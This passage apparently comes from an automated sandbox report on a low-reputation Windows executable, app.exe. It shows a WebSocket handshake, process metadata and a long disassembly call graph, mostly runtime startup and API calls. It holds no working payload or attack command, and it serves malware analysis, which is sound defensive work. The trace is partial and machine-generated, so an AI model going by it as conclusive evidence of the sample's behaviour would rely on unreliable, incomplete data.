                                                                                                                                                                                                          Sec-WebSocket-Key: ScSGY5QfdPym9roNV3Q5ZA==
                                                                                                                                                                                                          Sec-WebSocket-Version: 13
                                                                                                                                                                                                          Connection: upgrade
                                                                                                                                                                                                          Nov 12, 2024 16:50:09.543019056 CET129INHTTP/1.1 101 Switching Protocols
                                                                                                                                                                                                          Upgrade: websocket
                                                                                                                                                                                                          Connection: Upgrade
                                                                                                                                                                                                          Sec-WebSocket-Accept: +JK+w9DUfgKEQM5zuhXi80E72Hw=


                                                                                                                                                                                                          Statistics

                                                                                                                                                                                                          CPU Usage

                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                          Memory Usage

                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                                          Behavior

                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                          System Behavior

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                          Start time:10:49:59
                                                                                                                                                                                                          Start date:12/11/2024
                                                                                                                                                                                                          Path:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\app.exe"
                                                                                                                                                                                                          Imagebase:0x7ff7ace80000
                                                                                                                                                                                                          File size:27'056'395 bytes
                                                                                                                                                                                                          MD5 hash:EE3F845B0064D326C91BC200FE87FA2E
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                                          Start time:10:50:03
                                                                                                                                                                                                          Start date:12/11/2024
                                                                                                                                                                                                          Path:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\app.exe"
                                                                                                                                                                                                          Imagebase:0x7ff7ace80000
                                                                                                                                                                                                          File size:27'056'395 bytes
                                                                                                                                                                                                          MD5 hash:EE3F845B0064D326C91BC200FE87FA2E
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                          Disassembly

                                                                                                                                                                                                          Reset < >

                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                            Execution Coverage:10%
                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                            Signature Coverage:13.9%
                                                                                                                                                                                                            Total number of Nodes:2000
                                                                                                                                                                                                            Total number of Limit Nodes:32
                                                                                                                                                                                                            execution_graph 14725 7ff7ace9e80c 14726 7ff7ace9e9fe 14725->14726 14728 7ff7ace9e84e _isindst 14725->14728 14727 7ff7ace94374 _get_daylight 11 API calls 14726->14727 14745 7ff7ace9e9ee 14727->14745 14728->14726 14731 7ff7ace9e8ce _isindst 14728->14731 14746 7ff7acea52e4 14731->14746 14736 7ff7ace9ea2a 14786 7ff7ace99d00 IsProcessorFeaturePresent 14736->14786 14743 7ff7ace9e92b 14743->14745 14770 7ff7acea5328 14743->14770 14777 7ff7ace8acd0 14745->14777 14747 7ff7acea52f3 14746->14747 14750 7ff7ace9e8ec 14746->14750 14790 7ff7ace9f6b8 EnterCriticalSection 14747->14790 14752 7ff7acea46e8 14750->14752 14753 7ff7acea46f1 14752->14753 14754 7ff7ace9e901 14752->14754 14755 7ff7ace94374 _get_daylight 11 API calls 14753->14755 14754->14736 14758 7ff7acea4718 14754->14758 14756 7ff7acea46f6 14755->14756 14791 7ff7ace99ce0 14756->14791 14759 7ff7acea4721 14758->14759 14761 7ff7ace9e912 14758->14761 14760 7ff7ace94374 _get_daylight 11 API calls 14759->14760 14762 7ff7acea4726 14760->14762 14761->14736 14764 7ff7acea4748 14761->14764 14763 7ff7ace99ce0 _invalid_parameter_noinfo 37 API calls 14762->14763 14763->14761 14765 7ff7acea4751 14764->14765 14766 7ff7ace9e923 14764->14766 14767 7ff7ace94374 _get_daylight 11 API calls 14765->14767 14766->14736 14766->14743 14768 7ff7acea4756 14767->14768 14769 7ff7ace99ce0 _invalid_parameter_noinfo 37 API calls 14768->14769 14769->14766 14831 7ff7ace9f6b8 EnterCriticalSection 14770->14831 14778 7ff7ace8acd9 14777->14778 14779 7ff7ace8ace4 14778->14779 14780 7ff7ace8b000 IsProcessorFeaturePresent 14778->14780 14781 7ff7ace8b018 14780->14781 14832 7ff7ace8b1f4 RtlCaptureContext 14781->14832 14787 7ff7ace99d13 14786->14787 14837 7ff7ace99a14 14787->14837 14793 7ff7ace99b78 14791->14793 14794 7ff7ace99ba3 14793->14794 14797 7ff7ace99c14 14794->14797 14796 7ff7ace99bca 14805 7ff7ace9995c 14797->14805 14800 7ff7ace99c4f 14800->14796 14803 7ff7ace99d00 _wfindfirst32i64 17 API calls 14804 7ff7ace99cdf 14803->14804 14806 7ff7ace999b3 14805->14806 14807 7ff7ace99978 GetLastError 14805->14807 14806->14800 14811 7ff7ace999c8 14806->14811 14808 7ff7ace99988 14807->14808 14814 7ff7ace9a790 14808->14814 14812 7ff7ace999e4 GetLastError SetLastError 14811->14812 14813 7ff7ace999fc 14811->14813 14812->14813 14813->14800 14813->14803 14815 7ff7ace9a7af FlsGetValue 14814->14815 14816 7ff7ace9a7ca FlsSetValue 14814->14816 14817 7ff7ace9a7c4 14815->14817 14819 7ff7ace999a3 SetLastError 14815->14819 14818 7ff7ace9a7d7 14816->14818 14816->14819 14817->14816 14820 7ff7ace9dc70 _get_daylight 11 API calls 14818->14820 14819->14806 14821 7ff7ace9a7e6 14820->14821 14822 7ff7ace9a804 FlsSetValue 14821->14822 14823 7ff7ace9a7f4 FlsSetValue 14821->14823 14825 7ff7ace9a810 FlsSetValue 14822->14825 14826 7ff7ace9a822 14822->14826 14824 7ff7ace9a7fd 14823->14824 14828 7ff7ace99d48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 14824->14828 14825->14824 14827 7ff7ace9a2f4 _get_daylight 11 API calls 14826->14827 14829 7ff7ace9a82a 14827->14829 14828->14819 14830 7ff7ace99d48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 14829->14830 14830->14819 14833 7ff7ace8b20e RtlLookupFunctionEntry 14832->14833 14834 7ff7ace8b224 RtlVirtualUnwind 14833->14834 14835 7ff7ace8b02b 14833->14835 14834->14833 14834->14835 14836 7ff7ace8afc4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 14835->14836 14838 7ff7ace99a4e _wfindfirst32i64 memcpy_s 14837->14838 14839 7ff7ace99a76 RtlCaptureContext RtlLookupFunctionEntry 14838->14839 14840 7ff7ace99ab0 RtlVirtualUnwind 14839->14840 14841 7ff7ace99ae6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 14839->14841 14840->14841 14842 7ff7ace99b38 _wfindfirst32i64 14841->14842 14843 7ff7ace8acd0 _wfindfirst32i64 8 API calls 14842->14843 14844 7ff7ace99b57 GetCurrentProcess TerminateProcess 14843->14844 18508 7ff7ace98980 18511 7ff7ace98900 18508->18511 18518 7ff7ace9f6b8 EnterCriticalSection 18511->18518 18519 7ff7acea9582 18522 7ff7ace94228 LeaveCriticalSection 18519->18522 17661 7ff7acea93fc 17662 7ff7acea940c 17661->17662 17665 7ff7ace94228 LeaveCriticalSection 17662->17665 17856 7ff7acea6ed0 17859 7ff7acea1660 17856->17859 17860 7ff7acea16b2 17859->17860 17861 7ff7acea166d 17859->17861 17865 7ff7ace9a624 17861->17865 17866 7ff7ace9a650 FlsSetValue 17865->17866 17867 7ff7ace9a635 FlsGetValue 17865->17867 17868 7ff7ace9a642 17866->17868 17870 7ff7ace9a65d 17866->17870 17867->17868 17869 7ff7ace9a64a 17867->17869 17871 7ff7ace9a648 17868->17871 17872 7ff7ace9913c __GetCurrentState 45 API calls 17868->17872 17869->17866 17873 7ff7ace9dc70 _get_daylight 11 API calls 17870->17873 17885 7ff7acea1334 17871->17885 17874 7ff7ace9a6c5 17872->17874 17875 7ff7ace9a66c 17873->17875 17876 7ff7ace9a68a FlsSetValue 17875->17876 17877 7ff7ace9a67a FlsSetValue 17875->17877 17878 7ff7ace9a696 FlsSetValue 17876->17878 17879 7ff7ace9a6a8 17876->17879 17880 7ff7ace9a683 17877->17880 17878->17880 17881 7ff7ace9a2f4 _get_daylight 11 API calls 17879->17881 17882 7ff7ace99d48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17880->17882 17883 7ff7ace9a6b0 17881->17883 17882->17868 17884 7ff7ace99d48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17883->17884 17884->17871 17908 7ff7acea15a4 17885->17908 17887 7ff7acea1369 17923 7ff7acea1034 17887->17923 17890 7ff7acea1386 17890->17860 17891 7ff7ace9c9fc _fread_nolock 12 API calls 17892 7ff7acea1397 17891->17892 17893 7ff7acea139f 17892->17893 17895 7ff7acea13ae 17892->17895 17894 7ff7ace99d48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17893->17894 17894->17890 17895->17895 17930 7ff7acea16dc 17895->17930 17898 7ff7acea14aa 17899 7ff7ace94374 _get_daylight 11 API calls 17898->17899 17900 7ff7acea14af 17899->17900 17903 7ff7ace99d48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17900->17903 17901 7ff7acea1505 17902 7ff7acea156c 17901->17902 17941 7ff7acea0e64 17901->17941 17906 7ff7ace99d48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17902->17906 17903->17890 17904 7ff7acea14c4 17904->17901 17907 7ff7ace99d48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17904->17907 17906->17890 17907->17901 17909 7ff7acea15c7 17908->17909 17911 7ff7acea15d1 17909->17911 17956 7ff7ace9f6b8 EnterCriticalSection 17909->17956 17912 7ff7acea1643 17911->17912 17914 7ff7ace9913c __GetCurrentState 45 API calls 17911->17914 17912->17887 17916 7ff7acea165b 17914->17916 17918 7ff7acea16b2 17916->17918 17920 7ff7ace9a624 50 API calls 17916->17920 17918->17887 17921 7ff7acea169c 17920->17921 17922 7ff7acea1334 65 API calls 17921->17922 17922->17918 17924 7ff7ace9494c 45 API calls 17923->17924 17925 7ff7acea1048 17924->17925 17926 7ff7acea1054 GetOEMCP 17925->17926 17927 7ff7acea1066 17925->17927 17929 7ff7acea107b 17926->17929 17928 7ff7acea106b GetACP 17927->17928 17927->17929 17928->17929 17929->17890 17929->17891 17931 7ff7acea1034 47 API calls 17930->17931 17933 7ff7acea1709 17931->17933 17932 7ff7acea185f 17934 7ff7ace8acd0 _wfindfirst32i64 8 API calls 17932->17934 17933->17932 17935 7ff7acea1746 IsValidCodePage 17933->17935 17940 7ff7acea1760 memcpy_s 17933->17940 17936 7ff7acea14a1 17934->17936 17935->17932 17937 7ff7acea1757 17935->17937 17936->17898 17936->17904 17938 7ff7acea1786 GetCPInfo 17937->17938 17937->17940 17938->17932 17938->17940 17957 7ff7acea114c 17940->17957 18028 7ff7ace9f6b8 EnterCriticalSection 17941->18028 17958 7ff7acea1189 GetCPInfo 17957->17958 17959 7ff7acea127f 17957->17959 17958->17959 17964 7ff7acea119c 17958->17964 17960 7ff7ace8acd0 _wfindfirst32i64 8 API calls 17959->17960 17962 7ff7acea131e 17960->17962 17962->17932 17968 7ff7acea1e90 17964->17968 17967 7ff7acea6e34 54 API calls 17967->17959 17969 7ff7ace9494c 45 API calls 17968->17969 17970 7ff7acea1ed2 17969->17970 17971 7ff7ace9e720 _fread_nolock MultiByteToWideChar 17970->17971 17973 7ff7acea1f08 17971->17973 17972 7ff7acea1f0f 17975 7ff7ace8acd0 _wfindfirst32i64 8 API calls 17972->17975 17973->17972 17974 7ff7ace9c9fc _fread_nolock 12 API calls 17973->17974 17976 7ff7acea1fcc 17973->17976 17979 7ff7acea1f38 memcpy_s 17973->17979 17974->17979 17977 7ff7acea1213 17975->17977 17976->17972 17978 7ff7ace99d48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17976->17978 17983 7ff7acea6e34 17977->17983 17978->17972 17979->17976 17980 7ff7ace9e720 _fread_nolock MultiByteToWideChar 17979->17980 17981 7ff7acea1fae 17980->17981 17981->17976 17982 7ff7acea1fb2 GetStringTypeW 17981->17982 17982->17976 17984 7ff7ace9494c 45 API calls 17983->17984 17985 7ff7acea6e59 17984->17985 17988 7ff7acea6b00 17985->17988 17989 7ff7acea6b41 17988->17989 17990 7ff7ace9e720 _fread_nolock MultiByteToWideChar 17989->17990 17993 7ff7acea6b8b 17990->17993 17991 7ff7ace8acd0 _wfindfirst32i64 8 API calls 17992 7ff7acea1246 17991->17992 17992->17967 17994 7ff7ace9c9fc _fread_nolock 12 API calls 17993->17994 17995 7ff7acea6cc1 17993->17995 17996 7ff7acea6e09 17993->17996 17997 7ff7acea6bc3 17993->17997 17994->17997 17995->17996 17998 7ff7ace99d48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17995->17998 17996->17991 17997->17995 17999 7ff7ace9e720 _fread_nolock MultiByteToWideChar 17997->17999 17998->17996 18000 7ff7acea6c36 17999->18000 18000->17995 18019 7ff7ace9e0bc 18000->18019 18003 7ff7acea6cd2 18005 7ff7ace9c9fc _fread_nolock 12 API calls 18003->18005 18007 7ff7acea6da4 18003->18007 18009 7ff7acea6cf0 18003->18009 18004 7ff7acea6c81 18004->17995 18006 7ff7ace9e0bc __crtLCMapStringW 6 API calls 18004->18006 18005->18009 18006->17995 18007->17995 18008 7ff7ace99d48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18007->18008 18008->17995 18009->17995 18010 7ff7ace9e0bc __crtLCMapStringW 6 API calls 18009->18010 18011 7ff7acea6d70 18010->18011 18011->18007 18012 7ff7acea6d90 18011->18012 18013 7ff7acea6da6 18011->18013 18014 7ff7ace9efe8 WideCharToMultiByte 18012->18014 18015 7ff7ace9efe8 WideCharToMultiByte 18013->18015 18016 7ff7acea6d9e 18014->18016 18015->18016 18016->18007 18017 7ff7acea6dbe 18016->18017 18017->17995 18018 7ff7ace99d48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18017->18018 18018->17995 18020 7ff7ace9dce8 __crtLCMapStringW 5 API calls 18019->18020 18021 7ff7ace9e0fa 18020->18021 18022 7ff7ace9e102 18021->18022 18025 7ff7ace9e1a8 18021->18025 18022->17995 18022->18003 18022->18004 18024 7ff7ace9e16b LCMapStringW 18024->18022 18026 7ff7ace9dce8 __crtLCMapStringW 5 API calls 18025->18026 18027 7ff7ace9e1d6 __crtLCMapStringW 18026->18027 18027->18024 18029 7ff7ace9a3d0 18030 7ff7ace9a3ea 18029->18030 18031 7ff7ace9a3d5 18029->18031 18035 7ff7ace9a3f0 18031->18035 18036 7ff7ace9a432 18035->18036 18039 7ff7ace9a43a 18035->18039 18037 7ff7ace99d48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18036->18037 18037->18039 18038 7ff7ace99d48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18040 7ff7ace9a447 18038->18040 18039->18038 18041 7ff7ace99d48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18040->18041 18042 7ff7ace9a454 18041->18042 18043 7ff7ace99d48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18042->18043 18044 7ff7ace9a461 18043->18044 18045 7ff7ace99d48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18044->18045 18046 7ff7ace9a46e 18045->18046 18047 7ff7ace99d48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18046->18047 18048 7ff7ace9a47b 18047->18048 18049 7ff7ace99d48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18048->18049 18050 7ff7ace9a488 18049->18050 18051 7ff7ace99d48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18050->18051 18052 7ff7ace9a495 18051->18052 18053 7ff7ace99d48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18052->18053 18054 7ff7ace9a4a5 18053->18054 18055 7ff7ace99d48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18054->18055 18056 7ff7ace9a4b5 18055->18056 18061 7ff7ace9a294 18056->18061 18075 7ff7ace9f6b8 EnterCriticalSection 18061->18075 18655 7ff7ace8ad50 18656 7ff7ace8ad60 18655->18656 18672 7ff7ace956cc 18656->18672 18658 7ff7ace8ad6c 18678 7ff7ace8b2f8 18658->18678 18660 7ff7ace8b5dc 7 API calls 18662 7ff7ace8ae05 18660->18662 18661 7ff7ace8ad84 _RTC_Initialize 18670 7ff7ace8add9 18661->18670 18683 7ff7ace8b4a8 18661->18683 18664 7ff7ace8ad99 18686 7ff7ace97d9c 18664->18686 18670->18660 18671 7ff7ace8adf5 18670->18671 18673 7ff7ace956dd 18672->18673 18674 7ff7ace956e5 18673->18674 18675 7ff7ace94374 _get_daylight 11 API calls 18673->18675 18674->18658 18676 7ff7ace956f4 18675->18676 18677 7ff7ace99ce0 _invalid_parameter_noinfo 37 API calls 18676->18677 18677->18674 18679 7ff7ace8b309 18678->18679 18682 7ff7ace8b30e __scrt_release_startup_lock 18678->18682 18680 7ff7ace8b5dc 7 API calls 18679->18680 18679->18682 18681 7ff7ace8b382 18680->18681 18682->18661 18711 7ff7ace8b46c 18683->18711 18685 7ff7ace8b4b1 18685->18664 18687 7ff7ace97dbc 18686->18687 18693 7ff7ace8ada5 18686->18693 18688 7ff7ace97dc4 18687->18688 18689 7ff7ace97dda GetModuleFileNameW 18687->18689 18690 7ff7ace94374 _get_daylight 11 API calls 18688->18690 18694 7ff7ace97e05 18689->18694 18691 7ff7ace97dc9 18690->18691 18692 7ff7ace99ce0 _invalid_parameter_noinfo 37 API calls 18691->18692 18692->18693 18693->18670 18710 7ff7ace8b57c InitializeSListHead 18693->18710 18695 7ff7ace97d3c 11 API calls 18694->18695 18696 7ff7ace97e45 18695->18696 18697 7ff7ace97e4d 18696->18697 18702 7ff7ace97e65 18696->18702 18698 7ff7ace94374 _get_daylight 11 API calls 18697->18698 18699 7ff7ace97e52 18698->18699 18700 7ff7ace99d48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18699->18700 18700->18693 18701 7ff7ace97e87 18703 7ff7ace99d48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18701->18703 18702->18701 18704 7ff7ace97eb3 18702->18704 18705 7ff7ace97ecc 18702->18705 18703->18693 18706 7ff7ace99d48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18704->18706 18707 7ff7ace99d48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18705->18707 18708 7ff7ace97ebc 18706->18708 18707->18701 18709 7ff7ace99d48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18708->18709 18709->18693 18712 7ff7ace8b486 18711->18712 18713 7ff7ace8b47f 18711->18713 18715 7ff7ace98e1c 18712->18715 18713->18685 18718 7ff7ace98a58 18715->18718 18725 7ff7ace9f6b8 EnterCriticalSection 18718->18725 18186 7ff7ace941c0 18187 7ff7ace941cb 18186->18187 18195 7ff7ace9e284 18187->18195 18208 7ff7ace9f6b8 EnterCriticalSection 18195->18208 14845 7ff7ace8ae3c 14866 7ff7ace8b2ac 14845->14866 14848 7ff7ace8af88 14968 7ff7ace8b5dc IsProcessorFeaturePresent 14848->14968 14849 7ff7ace8ae58 __scrt_acquire_startup_lock 14851 7ff7ace8af92 14849->14851 14853 7ff7ace8ae76 __scrt_release_startup_lock 14849->14853 14852 7ff7ace8b5dc 7 API calls 14851->14852 14855 7ff7ace8af9d __GetCurrentState 14852->14855 14854 7ff7ace8ae9b 14853->14854 14856 7ff7ace8af21 14853->14856 14957 7ff7ace988b4 14853->14957 14872 7ff7ace8b728 14856->14872 14858 7ff7ace8af26 14875 7ff7ace81000 14858->14875 14863 7ff7ace8af49 14863->14855 14964 7ff7ace8b440 14863->14964 14975 7ff7ace8b8ac 14866->14975 14869 7ff7ace8ae50 14869->14848 14869->14849 14870 7ff7ace8b2db __scrt_initialize_crt 14870->14869 14977 7ff7ace8ca08 14870->14977 15004 7ff7ace8c150 14872->15004 14876 7ff7ace8100b 14875->14876 15006 7ff7ace87570 14876->15006 14878 7ff7ace8101d 15013 7ff7ace94e44 14878->15013 14880 7ff7ace8365b 15020 7ff7ace81af0 14880->15020 14884 7ff7ace8acd0 _wfindfirst32i64 8 API calls 14885 7ff7ace8378e 14884->14885 14962 7ff7ace8b76c GetModuleHandleW 14885->14962 14886 7ff7ace83679 14949 7ff7ace8377a 14886->14949 15036 7ff7ace83b00 14886->15036 14888 7ff7ace836ab 14888->14949 15039 7ff7ace86970 14888->15039 14890 7ff7ace836c7 14891 7ff7ace83713 14890->14891 14893 7ff7ace86970 61 API calls 14890->14893 15054 7ff7ace86f10 14891->15054 14897 7ff7ace836e8 __std_exception_copy 14893->14897 14894 7ff7ace83728 15058 7ff7ace819d0 14894->15058 14897->14891 14901 7ff7ace86f10 58 API calls 14897->14901 14898 7ff7ace8381d 14899 7ff7ace83848 14898->14899 15163 7ff7ace83260 14898->15163 14908 7ff7ace8388b 14899->14908 15069 7ff7ace879a0 14899->15069 14900 7ff7ace819d0 121 API calls 14904 7ff7ace8375e 14900->14904 14901->14891 14906 7ff7ace83762 14904->14906 14907 7ff7ace837a0 14904->14907 14905 7ff7ace83868 14909 7ff7ace8387e SetDllDirectoryW 14905->14909 14910 7ff7ace8386d 14905->14910 15127 7ff7ace82770 14906->15127 14907->14898 15140 7ff7ace83c90 14907->15140 15083 7ff7ace85e20 14908->15083 14909->14908 14913 7ff7ace82770 59 API calls 14910->14913 14913->14949 14917 7ff7ace838e6 14924 7ff7ace839a6 14917->14924 14931 7ff7ace838f9 14917->14931 14918 7ff7ace837c2 14923 7ff7ace82770 59 API calls 14918->14923 14921 7ff7ace838a8 14921->14917 15177 7ff7ace85620 14921->15177 14922 7ff7ace837f0 14922->14898 14925 7ff7ace837f5 14922->14925 14923->14949 15087 7ff7ace830f0 14924->15087 15159 7ff7ace8f1dc 14925->15159 14938 7ff7ace83945 14931->14938 15277 7ff7ace81b30 14931->15277 14932 7ff7ace838bd 15197 7ff7ace855b0 14932->15197 14933 7ff7ace838dc 15271 7ff7ace85870 14933->15271 14938->14949 15281 7ff7ace83090 14938->15281 14939 7ff7ace838c7 14939->14933 14941 7ff7ace838cb 14939->14941 14940 7ff7ace839db 14942 7ff7ace86970 61 API calls 14940->14942 15265 7ff7ace85c70 14941->15265 14947 7ff7ace839e7 14942->14947 14945 7ff7ace83981 14948 7ff7ace85870 FreeLibrary 14945->14948 14947->14949 15104 7ff7ace86f50 14947->15104 14948->14949 14949->14884 14958 7ff7ace988ec 14957->14958 14959 7ff7ace988cb 14957->14959 17652 7ff7ace99008 14958->17652 14959->14856 14963 7ff7ace8b77d 14962->14963 14963->14863 14966 7ff7ace8b451 14964->14966 14965 7ff7ace8af60 14965->14854 14966->14965 14967 7ff7ace8ca08 __scrt_initialize_crt 7 API calls 14966->14967 14967->14965 14969 7ff7ace8b602 _wfindfirst32i64 memcpy_s 14968->14969 14970 7ff7ace8b621 RtlCaptureContext RtlLookupFunctionEntry 14969->14970 14971 7ff7ace8b64a RtlVirtualUnwind 14970->14971 14972 7ff7ace8b686 memcpy_s 14970->14972 14971->14972 14973 7ff7ace8b6b8 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 14972->14973 14974 7ff7ace8b70a _wfindfirst32i64 14973->14974 14974->14851 14976 7ff7ace8b2ce __scrt_dllmain_crt_thread_attach 14975->14976 14976->14869 14976->14870 14978 7ff7ace8ca10 14977->14978 14979 7ff7ace8ca1a 14977->14979 14983 7ff7ace8cd84 14978->14983 14979->14869 14984 7ff7ace8cd93 14983->14984 14986 7ff7ace8ca15 14983->14986 14991 7ff7ace8cfc0 14984->14991 14987 7ff7ace8cdf0 14986->14987 14988 7ff7ace8ce1b 14987->14988 14989 7ff7ace8ce1f 14988->14989 14990 7ff7ace8cdfe DeleteCriticalSection 14988->14990 14989->14979 14990->14988 14995 7ff7ace8ce28 14991->14995 14996 7ff7ace8ce6c __vcrt_FlsAlloc 14995->14996 15002 7ff7ace8cf42 TlsFree 14995->15002 14997 7ff7ace8ce9a LoadLibraryExW 14996->14997 14998 7ff7ace8cf31 GetProcAddress 14996->14998 14996->15002 15003 7ff7ace8cedd LoadLibraryExW 14996->15003 14999 7ff7ace8cf11 14997->14999 15000 7ff7ace8cebb GetLastError 14997->15000 14998->15002 14999->14998 15001 7ff7ace8cf28 FreeLibrary 14999->15001 15000->14996 15001->14998 15003->14996 15003->14999 15005 7ff7ace8b73f GetStartupInfoW 15004->15005 15005->14858 15007 7ff7ace8758f 15006->15007 15008 7ff7ace875e0 WideCharToMultiByte 15007->15008 15009 7ff7ace87597 __std_exception_copy 15007->15009 15011 7ff7ace87636 WideCharToMultiByte 15007->15011 15012 7ff7ace87688 15007->15012 15008->15007 15008->15012 15009->14878 15011->15007 15011->15012 15336 7ff7ace82620 15012->15336 15014 7ff7ace9eb70 15013->15014 15016 7ff7ace9ec16 15014->15016 15017 7ff7ace9ebc3 15014->15017 15015 7ff7ace99c14 _invalid_parameter_noinfo 37 API calls 15019 7ff7ace9ebec 15015->15019 15726 7ff7ace9ea48 15016->15726 15017->15015 15019->14880 15021 7ff7ace81b05 15020->15021 15022 7ff7ace81b20 15021->15022 15734 7ff7ace824d0 15021->15734 15022->14949 15024 7ff7ace83b80 15022->15024 15025 7ff7ace8ad00 15024->15025 15026 7ff7ace83b8c GetModuleFileNameW 15025->15026 15027 7ff7ace83bbb 15026->15027 15028 7ff7ace83bd2 15026->15028 15030 7ff7ace82620 57 API calls 15027->15030 15774 7ff7ace87ab0 15028->15774 15032 7ff7ace83bce 15030->15032 15034 7ff7ace8acd0 _wfindfirst32i64 8 API calls 15032->15034 15033 7ff7ace82770 59 API calls 15033->15032 15035 7ff7ace83c0f 15034->15035 15035->14886 15037 7ff7ace81b30 49 API calls 15036->15037 15038 7ff7ace83b1d 15037->15038 15038->14888 15040 7ff7ace8697a 15039->15040 15041 7ff7ace879a0 57 API calls 15040->15041 15042 7ff7ace8699c GetEnvironmentVariableW 15041->15042 15043 7ff7ace86a06 15042->15043 15044 7ff7ace869b4 ExpandEnvironmentStringsW 15042->15044 15046 7ff7ace8acd0 _wfindfirst32i64 8 API calls 15043->15046 15045 7ff7ace87ab0 59 API calls 15044->15045 15048 7ff7ace869dc 15045->15048 15047 7ff7ace86a18 15046->15047 15047->14890 15048->15043 15049 7ff7ace869e6 15048->15049 15785 7ff7ace9903c 15049->15785 15052 7ff7ace8acd0 _wfindfirst32i64 8 API calls 15053 7ff7ace869fe 15052->15053 15053->14890 15055 7ff7ace879a0 57 API calls 15054->15055 15056 7ff7ace86f27 SetEnvironmentVariableW 15055->15056 15057 7ff7ace86f3f __std_exception_copy 15056->15057 15057->14894 15059 7ff7ace81b30 49 API calls 15058->15059 15060 7ff7ace81a00 15059->15060 15061 7ff7ace81b30 49 API calls 15060->15061 15067 7ff7ace81a7a 15060->15067 15062 7ff7ace81a22 15061->15062 15063 7ff7ace83b00 49 API calls 15062->15063 15062->15067 15064 7ff7ace81a3b 15063->15064 15792 7ff7ace817b0 15064->15792 15067->14898 15067->14900 15068 7ff7ace8f1dc 74 API calls 15068->15067 15070 7ff7ace87a47 MultiByteToWideChar 15069->15070 15071 7ff7ace879c1 MultiByteToWideChar 15069->15071 15074 7ff7ace87a6a 15070->15074 15075 7ff7ace87a8f 15070->15075 15072 7ff7ace87a0c 15071->15072 15073 7ff7ace879e7 15071->15073 15072->15070 15080 7ff7ace87a22 15072->15080 15076 7ff7ace82620 55 API calls 15073->15076 15077 7ff7ace82620 55 API calls 15074->15077 15075->14905 15078 7ff7ace879fa 15076->15078 15079 7ff7ace87a7d 15077->15079 15078->14905 15079->14905 15081 7ff7ace82620 55 API calls 15080->15081 15082 7ff7ace87a35 15081->15082 15082->14905 15084 7ff7ace85e35 15083->15084 15085 7ff7ace83890 15084->15085 15086 7ff7ace824d0 59 API calls 15084->15086 15085->14917 15167 7ff7ace85ac0 15085->15167 15086->15085 15092 7ff7ace83163 15087->15092 15096 7ff7ace831a4 15087->15096 15088 7ff7ace831e3 15090 7ff7ace8acd0 _wfindfirst32i64 8 API calls 15088->15090 15089 7ff7ace81ab0 74 API calls 15089->15096 15091 7ff7ace831f5 15090->15091 15091->14949 15097 7ff7ace86ea0 15091->15097 15092->15096 15865 7ff7ace81440 15092->15865 15899 7ff7ace82990 15092->15899 15953 7ff7ace81780 15092->15953 15096->15088 15096->15089 15098 7ff7ace879a0 57 API calls 15097->15098 15099 7ff7ace86ebf 15098->15099 15100 7ff7ace879a0 57 API calls 15099->15100 15101 7ff7ace86ecf 15100->15101 15102 7ff7ace965e4 38 API calls 15101->15102 15103 7ff7ace86edd __std_exception_copy 15102->15103 15103->14940 15105 7ff7ace86f60 15104->15105 15106 7ff7ace879a0 57 API calls 15105->15106 15107 7ff7ace86f91 SetConsoleCtrlHandler GetStartupInfoW 15106->15107 15108 7ff7ace86ff2 15107->15108 16824 7ff7ace990b4 15108->16824 15112 7ff7ace87001 15113 7ff7ace990b4 _fread_nolock 37 API calls 15112->15113 15114 7ff7ace87018 15113->15114 15115 7ff7ace96e28 _fread_nolock 37 API calls 15114->15115 15116 7ff7ace8701f 15115->15116 15117 7ff7ace990b4 _fread_nolock 37 API calls 15116->15117 15118 7ff7ace87037 